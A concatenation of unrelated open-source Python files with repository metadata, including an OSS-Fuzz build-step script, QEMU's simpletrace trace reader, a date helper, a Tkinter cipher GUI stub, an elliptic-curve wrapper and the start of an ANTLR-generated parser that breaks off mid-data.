'python infra/helper.py check_build --sanitizer '
'{sanitizer} --engine {engine} --architecture '
'{architecture} {name}\n' + '*' * 80).format(
name=name,
sanitizer=sanitizer,
engine=fuzzing_engine,
architecture=architecture)
build_steps.append(
# test binaries
{
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env,
'args': [
'bash', '-c',
'test_all || (echo "{0}" && false)'.format(failure_msg)
],
})
if project_yaml['labels']:
# write target labels
build_steps.append({
'name':
image,
'env':
env,
'args': [
'/usr/local/bin/write_labels.py',
json.dumps(project_yaml['labels']),
out,
],
})
if sanitizer == 'dataflow' and fuzzing_engine == 'dataflow':
dataflow_steps = dataflow_post_build_steps(name, env)
if dataflow_steps:
build_steps.extend(dataflow_steps)
else:
sys.stderr.write('Skipping dataflow post build steps.\n')
build_steps.extend([
# generate targets list
{
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env,
'args': [
'bash',
'-c',
'targets_list > /workspace/{0}'.format(
targets_list_filename),
],
},
# zip binaries
{
'name':
image,
'args': [
'bash', '-c',
'cd {out} && zip -r {zip_file} *'.format(out=out,
zip_file=zip_file)
],
},
# upload srcmap
{
'name': 'gcr.io/oss-fuzz-base/uploader',
'args': [
'/workspace/srcmap.json',
srcmap_url,
],
},
# upload binaries
{
'name': 'gcr.io/oss-fuzz-base/uploader',
'args': [
os.path.join(out, zip_file),
upload_url,
],
},
# upload targets list
{
'name':
'gcr.io/oss-fuzz-base/uploader',
'args': [
'/workspace/{0}'.format(targets_list_filename),
targets_list_url,
],
},
# upload the latest.version file
build_lib.http_upload_step(zip_file, latest_version_url,
LATEST_VERSION_CONTENT_TYPE),
# cleanup
{
'name': image,
'args': [
'bash',
'-c',
'rm -r ' + out,
],
},
])
return build_steps
def dataflow_post_build_steps(project_name, env):
steps = build_lib.download_corpora_steps(project_name)
if not steps:
return None
steps.append({
'name':
'gcr.io/oss-fuzz-base/base-runner',
'env':
env + [
'COLLECT_DFT_TIMEOUT=2h',
'DFT_FILE_SIZE_LIMIT=65535',
'DFT_MIN_TIMEOUT=2.0',
'DFT_TIMEOUT_RANGE=6.0',
],
'args': [
'bash', '-c',
('for f in /corpus/*.zip; do unzip -q $f -d ${f%%.*}; done && '
'collect_dft || (echo "DFT collection failed." && false)')
],
'volumes': [{
'name': 'corpus',
'path': '/corpus'
}],
})
return steps
def get_logs_url(build_id):
URL_FORMAT = ('https://console.developers.google.com/logs/viewer?'
'resource=build%2Fbuild_id%2F{0}&project=oss-fuzz')
return URL_FORMAT.format(build_id)
def run_build(build_steps, project_name, tag):
options = {}
if 'GCB_OPTIONS' in os.environ:
options = yaml.safe_load(os.environ['GCB_OPTIONS'])
build_body = {
'steps': build_steps,
'timeout': str(build_lib.BUILD_TIMEOUT) + 's',
'options': options,
'logsBucket': GCB_LOGS_BUCKET,
'tags': [project_name + '-' + tag,],
}
credentials = GoogleCredentials.get_application_default()
cloudbuild = build('cloudbuild', 'v1', credentials=credentials)
build_info = cloudbuild.projects().builds().create(projectId='oss-fuzz',
body=build_body).execute()
build_id = build_info['metadata']['build']['id']
print('Logs:', get_logs_url(build_id), file=sys.stderr)
print(build_id)
def main():
if len(sys.argv) != 2:
usage()
project_dir = sys.argv[1].rstrip(os.path.sep)
steps = get_build_steps(project_dir)
project_name = os.path.basename(project_dir)
run_build(steps, project_name, FUZZING_BUILD_TAG)
if __name__ == '__main__':
main()
| 32.966825
| 80
| 0.53249
|
8bbcb42cc4126dad27b43259f84b40161bcba088
| 5,917
|
py
|
Python
|
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | 9
|
2017-11-10T15:54:02.000Z
|
2021-04-15T20:57:29.000Z
|
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | null | null | null |
AndroidTrustyOS/external/qemu/scripts/simpletrace.py
|
haitao52198/TrustyOS
|
40ad09911aa12dd774fefcab9747c30da802d2c8
|
[
"Apache-2.0"
] | 7
|
2018-01-08T02:53:32.000Z
|
2020-10-15T13:01:46.000Z
|
#!/usr/bin/env python
#
# Pretty-printer for simple trace backend binary trace files
#
# Copyright IBM, Corp. 2010
#
# This work is licensed under the terms of the GNU GPL, version 2. See
# the COPYING file in the top-level directory.
#
# For help see docs/tracing.txt
import struct
import re
import inspect
from tracetool import _read_events, Event
from tracetool.backend.simple import is_string
header_event_id = 0xffffffffffffffff
header_magic = 0xf2b177cb0aa429b4
dropped_event_id = 0xfffffffffffffffe
log_header_fmt = '=QQQ'
rec_header_fmt = '=QQII'
def read_header(fobj, hfmt):
'''Read a trace record header'''
hlen = struct.calcsize(hfmt)
hdr = fobj.read(hlen)
if len(hdr) != hlen:
return None
return struct.unpack(hfmt, hdr)
def get_record(edict, rechdr, fobj):
"""Deserialize a trace record from a file into a tuple (event_num, timestamp, arg1, ..., arg6)."""
if rechdr is None:
return None
rec = (rechdr[0], rechdr[1])
if rechdr[0] != dropped_event_id:
event_id = rechdr[0]
event = edict[event_id]
for type, name in event.args:
if is_string(type):
                raw_len = fobj.read(4)
                (length,) = struct.unpack('=L', raw_len)
                s = fobj.read(length)
rec = rec + (s,)
else:
(value,) = struct.unpack('=Q', fobj.read(8))
rec = rec + (value,)
else:
(value,) = struct.unpack('=Q', fobj.read(8))
rec = rec + (value,)
return rec
def read_record(edict, fobj):
"""Deserialize a trace record from a file into a tuple (event_num, timestamp, arg1, ..., arg6)."""
rechdr = read_header(fobj, rec_header_fmt)
return get_record(edict, rechdr, fobj) # return tuple of record elements
def read_trace_file(edict, fobj):
"""Deserialize trace records from a file, yielding record tuples (event_num, timestamp, arg1, ..., arg6)."""
header = read_header(fobj, log_header_fmt)
if header is None or \
header[0] != header_event_id or \
header[1] != header_magic:
raise ValueError('Not a valid trace file!')
if header[2] != 0 and \
header[2] != 2:
raise ValueError('Unknown version of tracelog format!')
log_version = header[2]
if log_version == 0:
raise ValueError('Older log format, not supported with this QEMU release!')
while True:
rec = read_record(edict, fobj)
if rec is None:
break
yield rec
class Analyzer(object):
"""A trace file analyzer which processes trace records.
An analyzer can be passed to run() or process(). The begin() method is
invoked, then each trace record is processed, and finally the end() method
is invoked.
If a method matching a trace event name exists, it is invoked to process
that trace record. Otherwise the catchall() method is invoked."""
def begin(self):
"""Called at the start of the trace."""
pass
def catchall(self, event, rec):
"""Called if no specific method for processing a trace event has been found."""
pass
def end(self):
"""Called at the end of the trace."""
pass
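# Usage sketch (not part of the original file; the event name 'qemu_malloc' is
# hypothetical): any method whose name matches a trace event is invoked instead
# of catchall(), and it may optionally take the timestamp as its first argument
# (see build_fn() inside process() below).
#
#   class MallocAnalyzer(Analyzer):
#       def qemu_malloc(self, timestamp, size):
#           print 'malloc %d bytes at %d ns' % (size, timestamp)
#
#   run(MallocAnalyzer())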
def process(events, log, analyzer):
"""Invoke an analyzer on each event in a log."""
if isinstance(events, str):
events = _read_events(open(events, 'r'))
if isinstance(log, str):
log = open(log, 'rb')
enabled_events = []
dropped_event = Event.build("Dropped_Event(uint64_t num_events_dropped)")
edict = {dropped_event_id: dropped_event}
for e in events:
if 'disable' not in e.properties:
enabled_events.append(e)
for num, event in enumerate(enabled_events):
edict[num] = event
def build_fn(analyzer, event):
if isinstance(event, str):
return analyzer.catchall
fn = getattr(analyzer, event.name, None)
if fn is None:
return analyzer.catchall
event_argcount = len(event.args)
fn_argcount = len(inspect.getargspec(fn)[0]) - 1
if fn_argcount == event_argcount + 1:
# Include timestamp as first argument
return lambda _, rec: fn(*rec[1:2 + event_argcount])
else:
# Just arguments, no timestamp
return lambda _, rec: fn(*rec[2:2 + event_argcount])
analyzer.begin()
fn_cache = {}
for rec in read_trace_file(edict, log):
event_num = rec[0]
event = edict[event_num]
if event_num not in fn_cache:
fn_cache[event_num] = build_fn(analyzer, event)
fn_cache[event_num](event, rec)
analyzer.end()
def run(analyzer):
"""Execute an analyzer on a trace file given on the command-line.
This function is useful as a driver for simple analysis scripts. More
advanced scripts will want to call process() instead."""
import sys
if len(sys.argv) != 3:
sys.stderr.write('usage: %s <trace-events> <trace-file>\n' % sys.argv[0])
sys.exit(1)
events = _read_events(open(sys.argv[1], 'r'))
process(events, sys.argv[2], analyzer)
if __name__ == '__main__':
class Formatter(Analyzer):
def __init__(self):
self.last_timestamp = None
def catchall(self, event, rec):
i = 1
timestamp = rec[1]
if self.last_timestamp is None:
self.last_timestamp = timestamp
delta_ns = timestamp - self.last_timestamp
self.last_timestamp = timestamp
fields = [event.name, '%0.3f' % (delta_ns / 1000.0)]
for type, name in event.args:
if is_string(type):
fields.append('%s=%s' % (name, rec[i + 1]))
else:
fields.append('%s=0x%x' % (name, rec[i + 1]))
i += 1
print ' '.join(fields)
run(Formatter())
| 31.811828
| 112
| 0.607909
|
bcbb8bf582b7260b9220fd17207211d2dbc409eb
| 1,797
|
py
|
Python
|
utils/date.py
|
holachau/Supermercados_BAN
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | 3
|
2018-10-27T19:11:16.000Z
|
2018-10-28T18:49:53.000Z
|
utils/date.py
|
holachau/Trabajos-Practicos
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | 16
|
2018-10-28T14:12:42.000Z
|
2018-11-12T01:54:16.000Z
|
utils/date.py
|
holachau/Trabajos-Practicos
|
374d474dcd9bf763df129eae840fe17e1dd6f5f7
|
[
"MIT"
] | null | null | null |
from datetime import datetime, timedelta
formato = {
"date": {
"format": "%d-%m-%Y",
"label": "dd-mm-YYYY"
},
"datetime": {
"format": "%d-%m-%Y %H:%M:%S",
"label": "dd-mm-YYYY HH:mm:ss"
}
}
def newDate(fecha):
try:
return datetime.strptime(fecha, formato["date"]["format"])
except ValueError:
return False
def formatDate(fecha):
try:
return fecha.strftime(formato["date"]["format"])
except AttributeError:
return False
def fieldDate(label):
valido = False
    while not valido:
fecha = newDate(input("Ingresar " + label + " (" + formato["date"]["label"] +"): "))
if (fecha):
valido = True
else:
print("Error de formato...")
return fecha
def newDateTime(fecha):
try:
return datetime.strptime(fecha, formato["datetime"]["format"])
except ValueError:
return False
def formatDateTime(fecha):
try:
return fecha.strftime(formato["datetime"]["format"])
except AttributeError:
return False
def fieldDateTime(label):
valido = False
    while not valido:
fecha = newDateTime(input("Ingresar " + label + " (" + formato["datetime"]["label"] +"): "))
if (fecha):
valido = True
else:
print("Error de formato...")
return fecha
def now():
return datetime.now()
def addDays(fecha, days):
return fecha + timedelta(days=days)
#TEST
#DATE
# fecha = newDate('01-01-2008')
# print(fecha)
# print(type(fecha))
# print(formatDate(fecha))
# print(type(formatDate(fecha)))
#DATE TIME
# fecha = newDateTime('01-01-2008 22:10:1')
# print(fecha)
# print(type(fecha))
# print(formatDateTime(fecha))
# print(type(formatDateTime(fecha)))
| 23.644737
| 100
| 0.584307
|
cb0e91a72d4b2864d76b78527d3f3cbb813afd51
| 4,680
|
py
|
Python
|
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | 6
|
2015-09-10T02:22:21.000Z
|
2021-10-01T16:36:46.000Z
|
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | null | null | null |
trec2015/sbin/salience-regression-dev/nugget-dist-graph.py
|
kedz/cuttsum
|
992c21192af03fd2ef863f5ab7d10752f75580fa
|
[
"Apache-2.0"
] | 2
|
2018-04-04T10:44:32.000Z
|
2021-10-01T16:37:26.000Z
|
import cuttsum.events
import cuttsum.judgements
import cuttsum.corpora
from cuttsum.pipeline import InputStreamResource
from cuttsum.classifiers import NuggetRegressor
import matplotlib.pylab as plt
plt.style.use('ggplot')
import pandas as pd
import numpy as np
from datetime import datetime
nuggets = cuttsum.judgements.get_nuggets()
matches_df = cuttsum.judgements.get_merged_dataframe()
def get_input_stream(event, gold_probs, extractor="goose", thresh=.8, delay=None, topk=20,
max_nuggets=None, is_filter=False):
corpus = cuttsum.corpora.get_raw_corpus(event)
res = InputStreamResource()
df = pd.concat(
res.get_dataframes(event, corpus, extractor, thresh, delay, topk))
selector = (df["n conf"] == 1) & (df["nugget probs"].apply(len) == 0)
df.loc[selector, "nugget probs"] = df.loc[selector, "nuggets"].apply(lambda x: {n:1 for n in x})
df["true probs"] = df["nugget probs"].apply(lambda x: [val for key, val in x.items()] +[0])
df["true probs"] = df["true probs"].apply(lambda x: np.max(x))
df.loc[(df["n conf"] == 1) & (df["nuggets"].apply(len) == 0), "true probs"] = 0
if gold_probs is True:
df["probs"] = df["true probs"]
else:
df["probs"] = NuggetRegressor().predict(event, df)
df["nuggets"] = df["nugget probs"].apply(
lambda x: set([key for key, val in x.items() if val > .97]))
if max_nuggets is not None:
def sortme(x):
l = [(key, val) for key, val in x.items() if val > .5]
sorted(l, key=lambda y: y[1], reverse=True)
return [k for k,v in l[:max_nuggets]]
df["nuggets"] = df["nuggets"].apply(lambda x: x if len(x) <= max_nuggets else set([]))
#df["nuggets"] = df["nugget probs"].apply(sortme)
if is_filter:
nid2time = {}
nids = set(matches_df[matches_df["query id"] == event.query_id]["nugget id"].tolist())
for nid in nids:
ts = matches_df[matches_df["nugget id"] == nid]["update id"].apply(lambda x: int(x.split("-")[0])).tolist()
ts.sort()
nid2time[nid] = ts[0]
#tss = nuggets[nuggets["query id"] == event.query_id]["timestamp"].tolist()
#ids = nuggets[nuggets["query id"] == event.query_id]["nugget id"].tolist()
#nt = {nid: ts for ts, nid in zip(tss, ids)}
fltr_nuggets = []
for name, row in df.iterrows():
fltr_nuggets.append(
set([nug for nug in row["nuggets"] if nid2time[nug] <= row["timestamp"]]))
#print df[["nuggets", "timestamp"]].apply(lambda y: print y[0]) # datetime.utcfromtimestamp(int(y["timestamp"])))
#print nids
df["nuggets"] = fltr_nuggets
return df
plt.close("all")
df = cuttsum.judgements.get_merged_dataframe()
i = 1
for event in cuttsum.events.get_events():
if event.query_num > 25 or event.query_num == 7: continue
print event.fs_name()
timestamps = df[df["query id"] == event.query_id]["update id"].apply(lambda x: datetime.utcfromtimestamp(int(x.split("-")[0]))).tolist()
z = (event.end - event.start).total_seconds()
ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
y = [i] * len(ts_norm)
plt.plot(ts_norm, y, "x")
stream = get_input_stream(event, True, max_nuggets=3, is_filter=True)
timestamps = stream[stream["nuggets"].apply(len) > 0]["timestamp"].tolist()
timestamps = [datetime.utcfromtimestamp(int(ts)) for ts in timestamps]
ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
plt.plot(ts_norm, [i + .5] * len(ts_norm), "x")
# stream = get_input_stream(event, True, max_nuggets=None)
# timestamps = stream[stream["nuggets"].apply(len) > 0]["timestamp"].tolist()
# timestamps = [datetime.utcfromtimestamp(int(ts)) for ts in timestamps]
# ts_norm = [(ts - event.start).total_seconds() / z for ts in timestamps]
# plt.plot(ts_norm, [i + .6] * len(ts_norm), "x")
# if event.query_num == 3:
# from collections import defaultdict
# counts = defaultdict(int)
# for name, row in stream.iterrows():
# for nid in row["nuggets"]:
# counts[nid] += 1
# items = sorted(counts.items(), key=lambda x: x[1])
# for k, v in items:
# print k, v, nuggets[nuggets["nugget id"] == k].iloc[0]["text"]
# top2 = set([k for k,v in items[-2:]])
# for name, row in stream.iterrows():
# if len(top2.intersection(row["nuggets"])) > 0:
# print row["nuggets"]
# print row["pretty text"]
i += 1
plt.gca().set_ylim([0, 25])
plt.yticks(range(1,25))
plt.savefig("test.png")
| 41.052632
| 141
| 0.611966
|
2f380a1c03fd07b51070a7681d1c88a8151f7bad
| 613
|
py
|
Python
|
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
Aulas_2/Aula11/Calculadora.py
|
Sofista23/Aula2_Python
|
134d51bd7a33d753489ad2970a4f289273c93832
|
[
"MIT"
] | null | null | null |
def calculadora(x,y,alg):
if(alg=="+"):
r=x+y
print(f"A soma entre {x} e {y} é {r}!")
elif(alg=="-"):
        r = abs(x - y)
print(f"A diferença entre {x} e {y} é {r}!")
elif(alg=="*"):
r=x*y
print(f"O produto entre {x} e {y} é {r}!")
elif(alg=="/"):
if(y==0):
print("Impossível dividir algo por 0!")
else:
r=x/y
print(f"O resultado da divisão entre {x} e {y} é {r}!")
else:
print("Dados fornecidos inválidos!")
| 26.652174
| 67
| 0.414356
|
8dc29eab421c0851afd7e0385ff68be9e30944f5
| 966
|
py
|
Python
|
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
gui.py
|
Laxar0/trial-app-ht
|
d32bdeac4a2f7c22640553743a66988ce2fea945
|
[
"MIT"
] | null | null | null |
from tkinter import *
root = Tk()
root.geometry("425x150")
root['bg'] = 'Gray'
root.resizable(height = False, width = False)
root.title('Encoding')
r_var = IntVar()
entry1 = Entry(width = 50)
label1 = Label(text = 'Шифруемый текст: ')
entry2 = Entry(width = 50)
label2 = Label(text = 'Ключ: ')
b = Button(width = 12, height = 1, text = 'Создать шифр')
label = Label(text = 'Пример шифра')
r1 = Radiobutton(text = 'Зашифровать', var = r_var, value = 1)
r2 = Radiobutton(text = 'Расшифровать', var = r_var, value = 2)
label1['bg'] = 'Gray'
label2['bg'] = 'Gray'
label['bg'] = 'Gray'
r1['bg'] = 'Gray'
r2['bg'] = 'Gray'
label1.grid(row = 0, column = 0, columnspan = 2)
entry1.grid(row = 0, column = 2)
label2.grid(row = 1, column = 0, columnspan = 2)
entry2.grid(row = 1, column = 2)
b.grid(row = 3, column = 0, columnspan = 3)
r1.grid(row = 2, column = 1, sticky = N)
r2.grid(row = 2, column = 2)
label.grid(row = 4, column = 0, columnspan = 3)
root.mainloop()
| 26.108108
| 63
| 0.63354
|
0dcc594ee5221cdc70fabc8849beaeca80df4cad
| 2,458
|
py
|
Python
|
util/gendoubleconsts.py
|
wenq1/duktape
|
5ed3eee19b291f3b3de0b212cc62c0aba0ab4ecb
|
[
"MIT"
] | 4,268
|
2015-01-01T17:33:40.000Z
|
2022-03-31T17:53:31.000Z
|
util/gendoubleconsts.py
|
KiraanRK/esp32-duktape
|
1b7fbcb8bd6bfc346d92df30ec099df7f13b03aa
|
[
"MIT"
] | 1,667
|
2015-01-01T22:43:03.000Z
|
2022-02-23T22:27:19.000Z
|
util/gendoubleconsts.py
|
KiraanRK/esp32-duktape
|
1b7fbcb8bd6bfc346d92df30ec099df7f13b03aa
|
[
"MIT"
] | 565
|
2015-01-08T14:15:28.000Z
|
2022-03-31T16:29:31.000Z
|
#!/usr/bin/env python2
#
# Double constants, see http://en.wikipedia.org/wiki/Double-precision_floating-point_format.
# YAML builtins metadata expressed the constants in binary form (8 bytes of
# IEEE double data) to ensure bit exactness.
#
import struct
import mpmath
def create_double_constants_mpmath():
# Just a helper to use manually
# http://mpmath.googlecode.com/svn/trunk/doc/build/basics.html
mpmath.mp.prec = 1000 # 1000 bits
def printhex(name, x):
# to hex string, ready for create_double()
hex = struct.pack('>d', float(str(x))).encode('hex')
flt = struct.unpack('>d', hex.decode('hex'))[0]
print '%-11s -> %s (= %.20f)' % (name, hex, flt)
printhex('DBL_E', mpmath.mpf(mpmath.e))
printhex('DBL_LN10', mpmath.log(10))
printhex('DBL_LN2', mpmath.log(2))
printhex('DBL_LOG2E', mpmath.log(mpmath.e) / mpmath.log(2))
printhex('DBL_LOG10E', mpmath.log(mpmath.e) / mpmath.log(10))
printhex('DBL_PI', mpmath.mpf(mpmath.pi))
printhex('DBL_SQRT1_2', mpmath.mpf(1) / mpmath.sqrt(2))
printhex('DBL_SQRT2', mpmath.sqrt(2))
create_double_constants_mpmath()
def create_double(x):
return struct.unpack('>d', x.decode('hex'))[0]
DBL_NAN = create_double('7ff8000000000000') # a NaN matching our "normalized NAN" definition (see duk_tval.h)
DBL_POSITIVE_INFINITY = create_double('7ff0000000000000') # positive infinity (unique)
DBL_NEGATIVE_INFINITY = create_double('fff0000000000000') # negative infinity (unique)
DBL_MAX_DOUBLE = create_double('7fefffffffffffff') # 'Max Double'
DBL_MIN_DOUBLE = create_double('0000000000000001') # 'Min subnormal positive double'
DBL_E = create_double('4005bf0a8b145769') # (= 2.71828182845904509080)
DBL_LN10 = create_double('40026bb1bbb55516') # (= 2.30258509299404590109)
DBL_LN2 = create_double('3fe62e42fefa39ef') # (= 0.69314718055994528623)
DBL_LOG2E = create_double('3ff71547652b82fe') # (= 1.44269504088896338700)
DBL_LOG10E = create_double('3fdbcb7b1526e50e') # (= 0.43429448190325181667)
DBL_PI = create_double('400921fb54442d18') # (= 3.14159265358979311600)
DBL_SQRT1_2 = create_double('3fe6a09e667f3bcd') # (= 0.70710678118654757274)
DBL_SQRT2 = create_double('3ff6a09e667f3bcd') # (= 1.41421356237309514547)
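# Round-trip sketch (not in the original file; uses the Python 2 'hex' string
# codec exactly as create_double() does above):
#
#   assert struct.pack('>d', DBL_PI).encode('hex') == '400921fb54442d18'
#   assert DBL_POSITIVE_INFINITY == float('inf')
#   assert DBL_NAN != DBL_NAN   # NaN never compares equal to itself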
| 49.16
| 129
| 0.664361
|
37963681da48150a95ea2c996363c8ec0e2137e7
| 252
|
py
|
Python
|
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
python/easy/strings/mutations.py
|
Razor-87/hackerrank
|
b82dd1f97eeb3c2a9141b196b30b2820acd050e7
|
[
"Unlicense"
] | null | null | null |
# -*- coding: utf-8 -*-
def mutate_string(string: str, position: int, character: str) -> str:
"""
>>> mutate_string('abracadabra', 5, 'k')
'abrackdabra'
"""
lst = list(string)
lst[position] = character
return ''.join(lst)
| 21
| 69
| 0.571429
|
0efb702efb259e09689552b87aecca31b1d9bdb0
| 2,706
|
py
|
Python
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 48
|
2016-03-30T07:20:49.000Z
|
2022-01-27T10:48:43.000Z
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 11
|
2017-03-26T11:03:20.000Z
|
2021-06-01T15:54:03.000Z
|
cpp/py/ecpy/native/EC.py
|
andynuma/time-release-encryption-py3
|
a5c48d07fae8121b59100d4cd79d3e38402d928c
|
[
"MIT"
] | 12
|
2016-06-05T19:09:26.000Z
|
2021-04-18T04:23:20.000Z
|
from .library import *
from .FF import FF, FF_elem
from .EF import EF, EF_elem
import ast
class EC(NativeProxy):
def __init__(s, base, a, b):
s.base = base
s.a = a
s.b = b
if isinstance(base, FF):
ptr = lib.EC_FF_create(to_char_ptr(str(a)), to_char_ptr(str(b)), base.ptr)
tostring_func = lib.EC_FF_to_string
del_func = lib.EC_FF_delete
s.add_func = lib.EC_FF_add
s.sub_func = lib.EC_FF_sub
s.mul_func = lib.EC_FF_mul
s.type = 1
elif isinstance(base, EF):
ptr = lib.EC_EF_create(to_char_ptr(str(a)), to_char_ptr(str(b)), base.ptr, to_char_ptr(base.poly))
tostring_func = lib.EC_EF_to_string
del_func = lib.EC_EF_delete
s.add_func = lib.EC_EF_add
s.sub_func = lib.EC_EF_sub
s.mul_func = lib.EC_EF_mul
s.type = 2
NativeProxy.__init__(s, ptr, tostring_func, del_func)
def add(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem) and isinstance(b, EC_elem)
s.add_func(s.ptr, ret.ptr, a.ptr, b.ptr)
def sub(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem) and isinstance(b, EC_elem)
s.sub_func(s.ptr, ret.ptr, a.ptr, b.ptr)
def mul(s, ret, a, b):
assert isinstance(ret, EC_elem) and isinstance(a, EC_elem)
s.mul_func(s.ptr, ret.ptr, a.ptr, to_char_ptr(str(b)))
def div(s, ret, a, b):
raise NotImplementedError()
def pow(s, ret, a, b):
raise NotImplementedError()
class EC_elem(NativeProxy):
def __init__(s, curve, x, y, z=1):
from six import integer_types
def conv(x):
if s.curve.type == 1:
if isinstance(x, tuple):
return FF_elem(x[0])
else:
return FF_elem(x)
elif s.curve.type == 2:
if isinstance(x, tuple):
return EF_elem(x[0], x[1])
else:
return EF_elem(x, 0)
assert isinstance(curve, EC)
s.x = x
s.y = y
s.z = z
s.curve = curve
s.base = curve.base
if isinstance(x, integer_types + (tuple, )):
x = conv(x)
if isinstance(y, integer_types + (tuple, )):
y = conv(y)
if isinstance(z, integer_types + (tuple, )):
z = conv(z)
if s.curve.type == 1:
ptr = lib.EC_elem_FF_create(x.ptr, y.ptr, z.ptr)
tostring_func = lib.EC_elem_FF_to_string
del_func = lib.EC_elem_FF_delete
elif s.curve.type == 2:
ptr = lib.EC_elem_EF_create(x.ptr, y.ptr, z.ptr)
tostring_func = lib.EC_elem_EF_to_string
del_func = lib.EC_elem_EF_delete
NativeProxy.__init__(s, ptr, tostring_func, del_func)
def to_python(s):
r = str(s).lstrip("EC_elem").replace("EF_elem", "").replace("FF_elem", "")
return tuple(ast.literal_eval(r))
| 30.404494
| 104
| 0.626016
|
2e3bbbbb2e07a9074fbdbad5092e54d0b2cfd378
| 152,419
|
py
|
Python
|
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
src/LuryParser.py
|
lury-lang/expr2018
|
fcc5608041bdc2e82370451e2a40f024caf612de
|
[
"MIT"
] | null | null | null |
# Generated from Lury.g4 by ANTLR 4.7.1
# encoding: utf-8
from antlr4 import *
from io import StringIO
from typing.io import TextIO
import sys
def serializedATN():
with StringIO() as buf:
buf.write("\3\u608b\ua72a\u8133\ub9ed\u417c\u3be7\u7786\u5964\3A")
buf.write("\u0177\4\2\t\2\4\3\t\3\4\4\t\4\4\5\t\5\4\6\t\6\4\7\t\7")
buf.write("\4\b\t\b\4\t\t\t\4\n\t\n\4\13\t\13\4\f\t\f\4\r\t\r\4\16")
buf.write("\t\16\4\17\t\17\4\20\t\20\4\21\t\21\4\22\t\22\4\23\t\23")
buf.write("\4\24\t\24\4\25\t\25\4\26\t\26\4\27\t\27\4\30\t\30\4\31")
buf.write("\t\31\4\32\t\32\4\33\t\33\4\34\t\34\4\35\t\35\3\2\3\2")
buf.write("\7\2=\n\2\f\2\16\2@\13\2\3\2\3\2\3\3\3\3\3\4\3\4\3\4\7")
buf.write("\4I\n\4\f\4\16\4L\13\4\3\4\5\4O\n\4\3\4\3\4\3\5\3\5\3")
buf.write("\6\3\6\3\7\3\7\3\b\3\b\3\b\3\b\3\b\5\b^\n\b\3\t\3\t\3")
buf.write("\t\3\t\3\t\3\t\7\tf\n\t\f\t\16\ti\13\t\3\n\3\n\3\n\5\n")
buf.write("n\n\n\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13\3\13")
buf.write("\7\13\u0085\n\13\f\13\16\13\u0088\13\13\3\f\3\f\3\f\3")
buf.write("\f\3\f\3\f\3\f\3\f\3\f\7\f\u0093\n\f\f\f\16\f\u0096\13")
buf.write("\f\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\3\r\7\r\u00a1\n\r\f")
buf.write("\r\16\r\u00a4\13\r\3\16\3\16\3\16\3\16\3\16\3\16\7\16")
buf.write("\u00ac\n\16\f\16\16\16\u00af\13\16\3\17\3\17\3\17\3\17")
buf.write("\3\17\3\17\7\17\u00b7\n\17\f\17\16\17\u00ba\13\17\3\20")
buf.write("\3\20\3\20\3\20\3\20\3\20\7\20\u00c2\n\20\f\20\16\20\u00c5")
buf.write("\13\20\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\21\3\21\7")
buf.write("\21\u00d0\n\21\f\21\16\21\u00d3\13\21\3\22\3\22\3\22\3")
buf.write("\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\3\22\7\22\u00e1")
buf.write("\n\22\f\22\16\22\u00e4\13\22\3\23\3\23\3\23\3\23\3\23")
buf.write("\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\3\23\7\23")
buf.write("\u00f5\n\23\f\23\16\23\u00f8\13\23\3\24\3\24\3\24\5\24")
buf.write("\u00fd\n\24\3\25\3\25\3\25\5\25\u0102\n\25\3\26\3\26\3")
buf.write("\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\3\26\7\26")
buf.write("\u0110\n\26\f\26\16\26\u0113\13\26\3\27\3\27\3\30\3\30")
buf.write("\3\30\3\30\3\30\3\30\3\30\3\30\3\30\5\30\u0120\n\30\3")
